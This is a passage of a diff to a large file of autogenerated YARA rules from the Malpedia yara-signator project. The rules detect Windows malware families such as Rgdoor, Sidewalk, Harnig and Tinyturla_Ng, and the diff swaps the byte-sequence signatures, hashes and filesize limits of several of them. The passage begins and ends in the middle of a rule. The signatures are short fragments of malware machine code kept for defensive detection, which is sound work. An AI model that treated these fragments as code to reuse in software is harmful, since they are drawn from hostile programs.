-		$sequence_42 = { eb00 8b442404 89c1 89ca }
-		$sequence_43 = { 8954242c 8b44242c 89c1 89ca }
-		$sequence_44 = { 89442408 7598 8a442407 a801 }
-		$sequence_45 = { c20400 55 8bec 83ec34 8365fc00 }
-		$sequence_46 = { 6a01 6a02 ffd0 8906 }
-		$sequence_47 = { ff7508 ffd0 85c0 750e }
-		$sequence_48 = { 51 6880000000 68ffff0000 ff36 }
-		$sequence_49 = { 50 56 8bcb e8???????? 50 e8???????? }
-		$sequence_50 = { 7404 33c9 ffd0 33c0 }
-		$sequence_51 = { e8???????? 84c0 740f 6a05 }
-		$sequence_52 = { e8???????? 6880000000 55 55 }
-		$sequence_53 = { c3 55 8bec 837d0800 7422 }
-		$sequence_54 = { ff7508 ffd0 33c0 40 5d }
-		$sequence_55 = { 8d4de0 51 68???????? ffd0 }
-		$sequence_56 = { 6a00 6a02 ffd0 50 }
-		$sequence_57 = { 6a73 e8???????? 833f00 7523 }
-		$sequence_58 = { e8???????? 8bc8 a1???????? ff30 }
-		$sequence_59 = { 7403 c60000 b840000000 83fa40 0f4ed0 }
-		$sequence_60 = { 890424 e8???????? 31c0 83c420 5e }
-		$sequence_61 = { e8???????? 50 ffd7 85c0 7512 }
-		$sequence_62 = { eb0c e8???????? 8bf0 eb03 }
-		$sequence_63 = { e8???????? 50 53 8d4dd0 e8???????? 50 }
-		$sequence_64 = { 8b45cc 31c9 8b55d0 39c2 }
-		$sequence_65 = { 8038e9 89c1 8945d0 894dcc }
-		$sequence_66 = { 8b4838 8b5034 891424 894c2404 e8???????? 8b44241c }
-		$sequence_67 = { 01ca 83c205 807c0805e9 891424 74e9 }
-		$sequence_68 = { 8b442408 8038e9 890424 7517 8b0424 8b4801 89c2 }
-		$sequence_69 = { 6681394d5a 8945b8 894dc4 0f85b6000000 }
-		$sequence_70 = { 8b45e8 05ffff0000 25ffff0000 83c001 }
-		$sequence_71 = { 83797c00 8b7dbc 8945b4 8955b0 8975ac }
-		$sequence_72 = { 31c9 8b54241c 8b723c 8b7e3c 89f3 01fb }
-		$sequence_73 = { 5e c3 53 57 56 83ec20 8b442430 }
-		$sequence_74 = { c3 55 89e5 68???????? e8???????? 83c404 }
-		$sequence_75 = { 894dc4 0f85a1000000 8b45b8 83c018 8b4db8 8b5178 }
-		$sequence_76 = { 890424 8944241c e8???????? 89442418 e8???????? 83f800 }
-		$sequence_77 = { 8b55bc 8955c4 776a 31c0 8b4dac 8b510c 8b75bc }
-		$sequence_78 = { 56 57 53 55 81ec88010000 8bd8 }
-		$sequence_79 = { 25ffff0000 83c001 8b4da8 01c1 }
-		$sequence_80 = { c3 55 89e5 57 56 53 83ec54 }
-		$sequence_81 = { 89c6 8945f8 894df4 8975f0 7418 8b45f4 05ffff0000 }
-		$sequence_82 = { 83c454 5b 5e 5f 5d c3 55 }
-		$sequence_83 = { 25ffff0000 83c001 8b4df0 01c1 894de4 }
-		$sequence_84 = { c7424800b00400 8b7de4 c787cc00000000000000 c787c800000000000000 }
-		$sequence_85 = { 5b 5e 5d c3 55 89e5 6a00 }
-		$sequence_86 = { 894df0 8b45f0 83c40c 5e 5d c3 }
-		$sequence_87 = { 8b4df8 01c1 894df0 8b45f0 }
-		$sequence_88 = { 890c24 c744240400000000 8945f0 8955ec e8???????? 8b483c 6689ce }
-		$sequence_89 = { 7418 8b45e4 05ffff0000 25ffff0000 }
-		$sequence_90 = { 89c7 8945f0 894dec 8955e8 897de4 }
-		$sequence_91 = { 8b4de8 81c1ffff0000 81e1ffff0000 83c101 }
-		$sequence_92 = { 53 57 83ec5c 8b450c }
-		$sequence_93 = { 894de0 7505 e9???????? 8b45e0 83c438 5f }
-		$sequence_94 = { 57 83ec38 8b450c 8b4d08 8945f0 }
-		$sequence_95 = { 5b 5d c3 8b45d0 8b4dd4 668b55d8 }
-		$sequence_96 = { e9???????? 8b45e0 83c45c 5f 5b 5e }
-		$sequence_97 = { 68???????? 50 50 ffd2 }
-		$sequence_98 = { 8945c4 894dc0 885dbf 8975b8 }
-		$sequence_99 = { 8945a0 8955cc 74bc 8b45cc 83c454 5b 5e }
-		$sequence_100 = { 89e5 57 53 56 83ec38 }
-		$sequence_101 = { 53 83ec74 8b450c 8b4d08 31d2 8b713c 89cf }
-		$sequence_102 = { 83c438 5e 5b 5f }
-		$sequence_103 = { eb06 83c414 5b 5d c3 8b45f0 8b0c8504406e00 }
-		$sequence_104 = { 57 83ec20 8b4508 890424 }
-		$sequence_105 = { 8b7dcc 39f8 8945c8 75e4 83c448 5e 5f }
-		$sequence_106 = { 85d2 7412 33c0 50 50 56 }
-		$sequence_107 = { c3 8b45f0 8b0c8504406e00 8b55f8 39d1 8945ec 894de8 }
-		$sequence_108 = { c605????????00 e8???????? 8bd0 85d2 7412 }
-		$sequence_109 = { 83ec20 a1???????? 85c0 7416 8b0d???????? e8???????? 84c0 }
-		$sequence_110 = { 0f85dafeffff 8b45e4 83c474 5b }
-		$sequence_111 = { 895c2414 660fd6442418 660fd6442420 e8???????? 84c0 }
-		$sequence_112 = { e9???????? 8bcd 8d8424a8010000 50 }
-		$sequence_113 = { 53 81ecb0000000 8b4508 8d4dd8 c745d800000000 }
-		$sequence_114 = { 8955dc e8???????? 8d0de8306e00 890424 894c2404 e8???????? 8d0d44306e00 }
-		$sequence_115 = { 8855af 8975cc 751c 8b45a4 8a4daf 31d2 8a2c0575306e00 }
-		$sequence_116 = { 83c470 5b 5f 5e 5d c3 }
-		$sequence_117 = { c3 55 89e5 56 53 57 83ec54 }
-		$sequence_118 = { e9???????? 8b45e0 83c45c 5e 5f 5b }
-		$sequence_119 = { 897dd8 8b45d8 83c444 5b 5e }
-		$sequence_120 = { 57 53 83ec70 8b450c }
-		$sequence_121 = { 74bc 8b45cc 83c454 5f 5b 5e 5d }
-		$sequence_122 = { 57 56 83ec5c 8b450c 8b4d08 31d2 8b7008 }
-		$sequence_123 = { 89e5 53 56 57 83ec38 }
-		$sequence_124 = { 8d0d44306e00 31d2 890c24 c744240400000000 }
-		$sequence_125 = { 89723c c7424004000000 c742442c0c0200 c7424800b00400 8b7de4 }
-		$sequence_126 = { 8a2c0575306e00 83c001 38e9 8945a0 }
-		$sequence_127 = { 57 83ec54 8d055a232700 31c9 8d55d8 803d????????e9 }
-		$sequence_128 = { 52 8bd6 e8???????? 8bcf 53 }
-		$sequence_129 = { 8945d0 74e4 31c0 8d0d5a238400 8b55c8 39ca }
-		$sequence_130 = { 8a4daf 31d2 8a2c0575308400 83c001 }
-		$sequence_131 = { c744240400000000 8955e0 e8???????? 8d0dd8308400 }
-		$sequence_132 = { 8b4d08 8d155e302f00 83ec04 891424 8945e8 }
-		$sequence_133 = { 8d0d44308400 31d2 8b75f8 89461c 890c24 c744240400000000 8955e4 }
+		$sequence_0 = { e8???????? 68???????? 8d45f4 50 c745f400614100 e8???????? cc }
+		$sequence_1 = { c745ec00000000 84c0 7407 be01000000 eb15 51 e8???????? }
+		$sequence_2 = { 899ef6e80000 899eeca10000 8d8610700300 8986aee90000 8d861c970300 898632ea0000 }
+		$sequence_3 = { 8d55f0 52 8b11 8d45f4 50 52 }
+		$sequence_4 = { 899e876b0000 51 8b4dfc 899e9a6b0000 8d8696d20300 }
+		$sequence_5 = { 8d85e4f3ffff 50 8d8decfdffff 51 c78584f3ffff44000000 ff15???????? 8bf0 }
+		$sequence_6 = { 51 8d86a0d00300 8bcb e8???????? 83c404 84c0 }
+		$sequence_7 = { 8d8650e60300 8d961ef30100 898623bc0200 899634320200 8d8636a50200 898675af0200 }
+		$sequence_8 = { 8d8ee0920000 898e1caa0300 8d8e80720300 8d96305d0300 51 8b4df4 8d8600cf0300 }
+		$sequence_9 = { 89966c940300 8d9698ec0300 89964da90200 898e88aa0200 8986cbaa0200 8d860cea0300 8986f7aa0200 }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 1045504
 }
-rule MALPEDIA_Win_Rhttpctrl_Auto : FILE
+rule MALPEDIA_Win_Common_Magic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c1f067f-4c03-5217-84ef-e2056be8411e"
+		id = "af63221a-d89f-5b5e-b536-f2130b5cebfc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhttpctrl_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.common_magic_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "e08ad966d09dce27a6d8e5d5ac2bacf3849e80bd61e38dcdd72f40d98e9b8f3d"
+		logic_hash = "20951a1a53280d6d98a10f242cdfcf681eb6a68d19880713aace683e29423308"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99429,32 +99490,32 @@ rule MALPEDIA_Win_Rhttpctrl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { d1fe 6a55 ff34f5c0d54100 ff7508 e8???????? 83c40c 85c0 }
-		$sequence_1 = { ffd7 8b4c241c ff742410 8b35???????? 894114 ffd6 }
-		$sequence_2 = { 6a00 8d442418 50 8d4714 50 56 }
-		$sequence_3 = { 2bc3 39460c 0f8660ffffff 50 53 6aff ff7608 }
-		$sequence_4 = { 83c408 895f08 837f1400 c7471001000000 }
-		$sequence_5 = { 8b01 52 8d95f0d7ffff 52 ff5004 }
-		$sequence_6 = { 8d8424e4010000 6a00 50 e8???????? 83c40c c68424c001000000 }
-		$sequence_7 = { c705????????090400c0 c705????????01000000 c705????????01000000 6a04 58 6bc000 c780f43b420002000000 }
-		$sequence_8 = { 3bc1 7410 50 e8???????? 83c404 0f1085c0feffff 8b4508 }
-		$sequence_9 = { 8b7d0c 8bd9 85ff 7417 803e52 750c 807e0145 }
+		$sequence_0 = { e8???????? 59 5d c20400 e8???????? 85c0 0f84c02e0000 }
+		$sequence_1 = { 885c012e 8b049570804100 804c012d04 46 }
+		$sequence_2 = { 8d8de8fdffff c685a4fdffff00 51 ffb5a4fdffff 8d8dacfdffff }
+		$sequence_3 = { 68???????? 51 50 51 ffb580feffff 8d8d5cffffff e8???????? }
+		$sequence_4 = { 83c404 c645fc03 8b8d70ffffff 83f908 }
+		$sequence_5 = { 0f1f4000 0f1f840000000000 a1???????? c7855cffffff00000000 }
+		$sequence_6 = { ff7610 50 8d45c8 50 ffd7 }
+		$sequence_7 = { 75e8 8b7dd4 8b55c4 8d4dd4 8b45e8 8bf2 }
+		$sequence_8 = { 85c0 0f84c02e0000 c3 833d????????ff 7503 33c0 c3 }
+		$sequence_9 = { 90 668b0431 663b01 750a 83c102 83ea01 75ef }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Bohmini_Auto : FILE
+rule MALPEDIA_Win_Newbounce_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7ffa4356-333d-5cd0-8977-11f17aa9ceda"
+		id = "3e3986fe-0558-5f1b-99f3-eb9b18b9db79"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bohmini_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newbounce"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newbounce_auto.yar#L1-L149"
 		license_url = "N/A"
-		logic_hash = "4b7b42d940efc962d3653e13f1a5647032ad0ceec459f0054e3c714b4efdf65b"
+		logic_hash = "53993fab1fffe3be30682fcde23603c8013a2f2c28d0b685101dbd874fd28f1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99468,32 +99529,37 @@ rule MALPEDIA_Win_Bohmini_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd5 85c0 7503 ff430c 8b36 85f6 }
-		$sequence_1 = { 8d442408 c744240824020000 50 56 e8???????? 85c0 741f }
-		$sequence_2 = { 57 51 6a00 6a00 ff15???????? 85c0 }
-		$sequence_3 = { 50 8d542424 51 52 8d442424 6aff 50 }
-		$sequence_4 = { 33d0 8855fc 8d742600 8b4df0 034df8 8a55fc 8811 }
-		$sequence_5 = { c74424080c000000 c744241000000000 8944240c ff15???????? 8b542404 }
-		$sequence_6 = { 85c0 7529 8d442400 56 50 e8???????? 8bf0 }
-		$sequence_7 = { ffd6 8b3d???????? 50 ffd7 55 6a00 }
-		$sequence_8 = { 837e0c0a 7e47 8b4e08 51 e8???????? 83c404 }
-		$sequence_9 = { 8d442418 50 56 e8???????? eb0b }
+		$sequence_0 = { 83e00f 7e05 2bf0 83c610 }
+		$sequence_1 = { 7c11 8a03 4b8b8cf8a0b40600 48ffc3 }
+		$sequence_2 = { 7c2f 803b39 7f2a 488d4c2420 }
+		$sequence_3 = { 7c07 488d4c2438 eb0a 4889442430 488d4c2430 488b09 483b8e78020000 }
+		$sequence_4 = { 7c0c 488d15bad00200 e9???????? 488d1566d00200 }
+		$sequence_5 = { 7c8d 4863c8 498bd6 85c0 }
+		$sequence_6 = { 7c4b 4c8bc6 e8???????? 48017748 }
+		$sequence_7 = { 7c07 488d4c2460 eb0a 4889442468 }
+		$sequence_8 = { 81ec68010000 a1???????? 33c4 89842464010000 56 57 8bf1 }
+		$sequence_9 = { 81ec20020000 a1???????? 33c4 89842418020000 56 }
+		$sequence_10 = { 81ec50030000 a1???????? 33c5 8945ec 53 }
+		$sequence_11 = { 81ec28010000 a1???????? 33c5 8945fc 8b4610 }
+		$sequence_12 = { 81ec64060000 a1???????? 33c4 89842460060000 53 }
+		$sequence_13 = { 81ec8c010000 56 a1???????? 33c5 }
+		$sequence_14 = { 81ec58030000 a1???????? 33c4 89842450030000 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 8637440
 }
-rule MALPEDIA_Win_Webc2_Rave_Auto : FILE
+rule MALPEDIA_Win_Harnig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b8abe54-80f5-58ec-90da-b83888b1df6b"
+		id = "9abf1275-be08-57a2-b590-38e4b33996cd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_rave_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.harnig_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "af650f13ddb6ad439bdfa3dda339af75bc74ce9074c6268554058b1c377beaa8"
+		logic_hash = "87f18fe78ccecf6b99a233ae62c504e49ba2ae60d8433aec1b3aa385be172cee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99507,32 +99573,32 @@ rule MALPEDIA_Win_Webc2_Rave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8dbc24b0040000 83c9ff f2ae 8b06 8d9424b0040000 f7d1 }
-		$sequence_1 = { 8b742410 8bc6 85f6 89442418 }
-		$sequence_2 = { f3ab 85db aa 7464 eb06 8b35???????? }
-		$sequence_3 = { 83c410 f3ab aa 8d8424a0020000 50 6804010000 }
-		$sequence_4 = { c784248800000001010000 66899c248c000000 89842498000000 8984249c000000 ffd7 8b542420 50 }
-		$sequence_5 = { 81fb00040000 c644241300 0f87b4000000 b980000000 33c0 8dbc242c010000 }
-		$sequence_6 = { 42 56 51 8915???????? }
-		$sequence_7 = { 8b8c2410020000 33c0 8bd0 83e20f 40 }
-		$sequence_8 = { aa ffd5 83c410 8d842490000000 8d8c24a8030000 }
-		$sequence_9 = { e8???????? 83c404 85c0 0f848d000000 33c9 33d2 894c2410 }
+		$sequence_0 = { ebba be0cfb1473 56 6a03 e8???????? ff7508 }
+		$sequence_1 = { be0cfb1473 56 6a03 e8???????? ff7508 ffd0 56 }
+		$sequence_2 = { e8???????? 6a04 8d4df8 51 6a06 ff750c ffd0 }
+		$sequence_3 = { 6a06 56 68???????? e8???????? 56 8d85b8fdffff }
+		$sequence_4 = { ffd0 bb30ef0298 53 6a01 e8???????? 57 }
+		$sequence_5 = { 33ff 8945d0 68d34ee485 8d85b8fdffff 6a04 c745c03c000000 897dc8 }
+		$sequence_6 = { ffd7 6a06 56 68???????? e8???????? }
+		$sequence_7 = { e8???????? 56 8d85e0fdffff 50 ffd3 e8???????? }
+		$sequence_8 = { f3ab e8???????? 8d4df0 51 8d4dac 51 }
+		$sequence_9 = { 68d34ee485 8d85b8fdffff 6a04 c745c03c000000 897dc8 c745cc6c104000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Payloadbin_Auto : FILE
+rule MALPEDIA_Win_Sidewalk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "479cd137-2967-575a-8de8-bab23a965cce"
+		id = "39c1c961-da91-5a25-8ecb-047f3c9eb164"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.payloadbin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.payloadbin_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sidewalk_auto.yar#L1-L149"
 		license_url = "N/A"
-		logic_hash = "810f81f232eae27d52097e88c16ab90183a29e32277d9224dad94d2d9c691817"
+		logic_hash = "8deb72ecccbb130aa5e8724fff6a194c33523f3296434270b03ff0933ff78416"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99546,32 +99612,36 @@ rule MALPEDIA_Win_Payloadbin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744243003000000 488d4c2470 66448bc9 4487c2 6699 4c8d48b0 }
-		$sequence_1 = { 4d0fbddc 23c6 480fb7cb 0bd8 0fbfca 6698 418919 }
-		$sequence_2 = { 68eb3a8171 55 68396f8656 6819276b5f 682109a155 4c8b6c2438 48c7442438404fa1db }
-		$sequence_3 = { 4881c308000000 660fa4d81f f6d8 f9 9d d2e0 }
-		$sequence_4 = { 4153 310c24 6641ffc3 415b 403aea 6685d7 4863c9 }
-		$sequence_5 = { f9 f8 4151 41d2e1 311c24 4532cd 4522ce }
-		$sequence_6 = { ff15???????? 3ac3 e9???????? 0f8492010000 440fb7442430 488b542438 490fb7c9 }
-		$sequence_7 = { 8d56d4 fa 158935079e 9e 4657 250543b1d9 f661fd }
-		$sequence_8 = { 440fb7c1 4080fca3 6683f819 e9???????? 0f8703000000 4503c5 0fb703 }
-		$sequence_9 = { 4180fd52 4983c004 3bc8 e9???????? 0f860a000000 b801000000 e9???????? }
+		$sequence_0 = { 41c1c610 4503e6 4403cb 4533d1 4403ee 41c1c210 418bc3 }
+		$sequence_1 = { c1c010 4403d8 4133db c1c30c }
+		$sequence_2 = { ff15???????? 4885c0 750e 488bcf ff15???????? }
+		$sequence_3 = { 33f0 418bc1 4133c6 c1c608 c1c010 4403de 4403e8 }
+		$sequence_4 = { 4433f2 c1c710 4403df 41c1c610 4503e6 4403cb }
+		$sequence_5 = { c1e810 880a c1e918 884202 884a03 4183f810 }
+		$sequence_6 = { 48ffc1 488d040a 483bc6 7ce2 }
+		$sequence_7 = { 4133db c1c30c 03d3 8bf2 }
+		$sequence_8 = { 4133db 418bcd c1c307 4133c8 }
+		$sequence_9 = { 418b09 418bc0 c1e002 4d8d4904 4863d0 }
+		$sequence_10 = { 8a040f 3201 41880408 48ffc1 488d040a }
+		$sequence_11 = { c1e108 0bc8 0fb642fe c1e108 0bc8 41890c10 488d5204 }
+		$sequence_12 = { 488b05???????? 83780c00 7405 e8???????? 488b0d???????? }
+		$sequence_13 = { 89750b 4489750f 44897d03 448965ff }
 
 	condition:
-		7 of them and filesize < 3761152
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Ssload_Auto : FILE
+rule MALPEDIA_Win_Rgdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "30dda8cc-ed50-5e35-9e3b-577f2e01ce05"
+		id = "2eb99ad7-9e75-5845-969c-c304a1478e04"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ssload"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ssload_auto.yar#L1-L187"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rgdoor_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "ac05084ef9800673d1ca7ea15965552cfd923f1e160cfabe8236802f68f627b1"
+		logic_hash = "fb170bfaa8b6f4f88bfae97b02b3770495bd4a9f8715b2816fb97989dc207528"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99585,41 +99655,32 @@ rule MALPEDIA_Win_Ssload_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894dd4 51 8945e0 ff10 83c404 }
-		$sequence_1 = { f7e1 c1ea03 8d0492 8d0442 }
-		$sequence_2 = { 50 e8???????? 83c40c 01de 89770c e9???????? 8b770c }
-		$sequence_3 = { 85f6 b8ffffffff 0f48f8 81ff01020000 }
-		$sequence_4 = { c745d002000000 648b0d00000000 894de8 64a300000000 }
-		$sequence_5 = { 0fb6f0 83fe0c 7e0c 83fe1f 7e14 83fe20 7418 }
-		$sequence_6 = { 89d5 57 53 52 e8???????? 83c40c }
-		$sequence_7 = { 56 83ec2c 8b5c2444 8b6c2440 }
-		$sequence_8 = { 0f57c0 0f1144240c 894c2408 89442404 }
-		$sequence_9 = { 83ec0c 8db53cffffff 8baeb0000000 8b4608 }
-		$sequence_10 = { 83c40c 037de0 8b55d8 39d7 }
-		$sequence_11 = { 0345e8 2b45d4 8945dc e9???????? }
-		$sequence_12 = { 034828 8b55fc 894a2c eb0a }
-		$sequence_13 = { 034228 8945c4 6a00 6a01 6800000010 }
-		$sequence_14 = { 034a10 894de0 8b45e0 3b45dc 7606 8b4de0 894ddc }
-		$sequence_15 = { ffd1 83c408 ebbc 8b55fc 8b4208 50 e8???????? }
-		$sequence_16 = { 034214 50 8b4df8 51 e8???????? }
-		$sequence_17 = { 03420c 50 ff15???????? 8945f8 837df800 }
-		$sequence_18 = { 034110 50 8b550c 52 8b4de8 e8???????? }
+		$sequence_0 = { 4c8d0dbe380200 4c8b442448 488b542438 488b4c2440 83bc24c800000000 7413 }
+		$sequence_1 = { 488d0d53170100 e8???????? 85c0 754a 488d0d774a0000 e8???????? 488d152f170100 }
+		$sequence_2 = { ff15???????? 488d15e3580100 483305???????? 488bcb 488905???????? ff15???????? 488d15e5580100 }
+		$sequence_3 = { 4c8d25d8310200 83e01f 4c6bf858 498b04fc 420fbe4c3808 83e101 7449 }
+		$sequence_4 = { 488d4c2420 41b801000000 4889442458 e8???????? 488d05e6840100 488d154f530200 488d4c2420 }
+		$sequence_5 = { e8???????? 4c8bf8 4889842488000000 4885c0 }
+		$sequence_6 = { 4863ca 0fb7444b0c 6641898448c0410300 ffc2 ebe2 8bd7 }
+		$sequence_7 = { e8???????? 488bf0 488b8de0000000 48635104 }
+		$sequence_8 = { e9???????? 488d8a98000000 e9???????? 488d8ae0010000 e9???????? 488d8a60000000 e9???????? }
+		$sequence_9 = { 4c8d3d6c3c0100 4c8d6738 4c8d05e13d0100 488bd3 498bce e8???????? }
 
 	condition:
-		7 of them and filesize < 4950016
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Tinyturla_Ng_Auto : FILE
+rule MALPEDIA_Win_Evilbunny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "237c3b29-3ffe-58e0-8377-deec3f9ada49"
+		id = "09358091-8a71-53e9-955e-7e0615a7395b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyturla_ng"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinyturla_ng_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilbunny_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "053b5083da44c3f040d79aabaeaa3be9af43dd91f5cebec175c4332c307fa8d0"
+		logic_hash = "129d7389b0c5c744f879d0c6646586dd6514e45e4141df82d478776226b51b53"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99633,32 +99694,32 @@ rule MALPEDIA_Win_Tinyturla_Ng_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4881ec90000000 488b05???????? 4833c4 4889451f 488bda 488bf1 }
-		$sequence_1 = { 488bcf e8???????? 33c9 eb15 }
-		$sequence_2 = { 488d7027 4883e6e0 488946f8 eb36 b816000000 483bf8 480f42f8 }
-		$sequence_3 = { c60600 8b87b8020000 8987b4020000 8b8fb4020000 ff15???????? 80bfcc02000000 0f8579fdffff }
-		$sequence_4 = { 85c0 0f8572010000 488b4d0f 488d45ff 41b901000000 4889442420 4533c0 }
-		$sequence_5 = { 4863f0 ff15???????? 488bc8 4c8d4601 33d2 ff15???????? 488bd8 }
-		$sequence_6 = { 8b4558 83e001 85c0 7414 836558fe 488b4d60 }
-		$sequence_7 = { 488b4d0f 488d45ff 41b901000000 4889442420 4533c0 488d5517 ff15???????? }
-		$sequence_8 = { 803c0800 75f7 488d5550 48c7c0ffffffff 48ffc0 }
-		$sequence_9 = { 4c8d050f92ffff 33d2 33c9 e8???????? }
+		$sequence_0 = { eb37 6a00 8b4df4 2b4d0c 51 8b55fc 8b4218 }
+		$sequence_1 = { 2b45e4 1b55e8 8945a0 8955a4 eb0e c745a000000000 c745a400000000 }
+		$sequence_2 = { 8b55f8 8b4218 8b550c 891401 8b450c 0fb64805 83e103 }
+		$sequence_3 = { 8b5518 c1e20e 0bc2 50 8b4508 50 e8???????? }
+		$sequence_4 = { 8d8c3a4b661aa8 894df8 8b95ccfeffff c1ea02 8b85ccfeffff c1e01e 0bd0 }
+		$sequence_5 = { 55 8bec 51 8b4508 8b4824 034d0c 894dfc }
+		$sequence_6 = { e8???????? 8b55f8 c782060c000001000000 33c0 52 8bcd 50 }
+		$sequence_7 = { e8???????? 8b858cfeffff 52 8bcd 50 8d1540f91000 e8???????? }
+		$sequence_8 = { e8???????? 83c408 8b4dfc 51 8b95e4fdffff 52 8d85e8fdffff }
+		$sequence_9 = { 8b5508 8b4238 89413c 8b4d08 8a5510 885136 b801000000 }
 
 	condition:
-		7 of them and filesize < 635904
+		7 of them and filesize < 1695744
 }
-rule MALPEDIA_Win_Urlzone_Auto : FILE
+rule MALPEDIA_Win_Nexster_Bot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4dd4d8e5-7756-57be-8ce5-a21c7832bb2c"
+		id = "a43d5074-419f-56bf-9041-ecb4085c5c0f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.urlzone_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nexster_bot_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "c42481bd862ad161fd4e6a711568aaf0139280c4a77d4d9855a08ac723543c9d"
+		logic_hash = "030c2bb9e4dedc4e668df50b31810c5f051c7ed3a34092c75978caae787f72df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99672,34 +99733,34 @@ rule MALPEDIA_Win_Urlzone_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 81c4e8fbffff 53 56 57 8b4514 }
-		$sequence_1 = { 8910 33c0 8943e4 c745fcffffffff eb1f 46 83c340 }
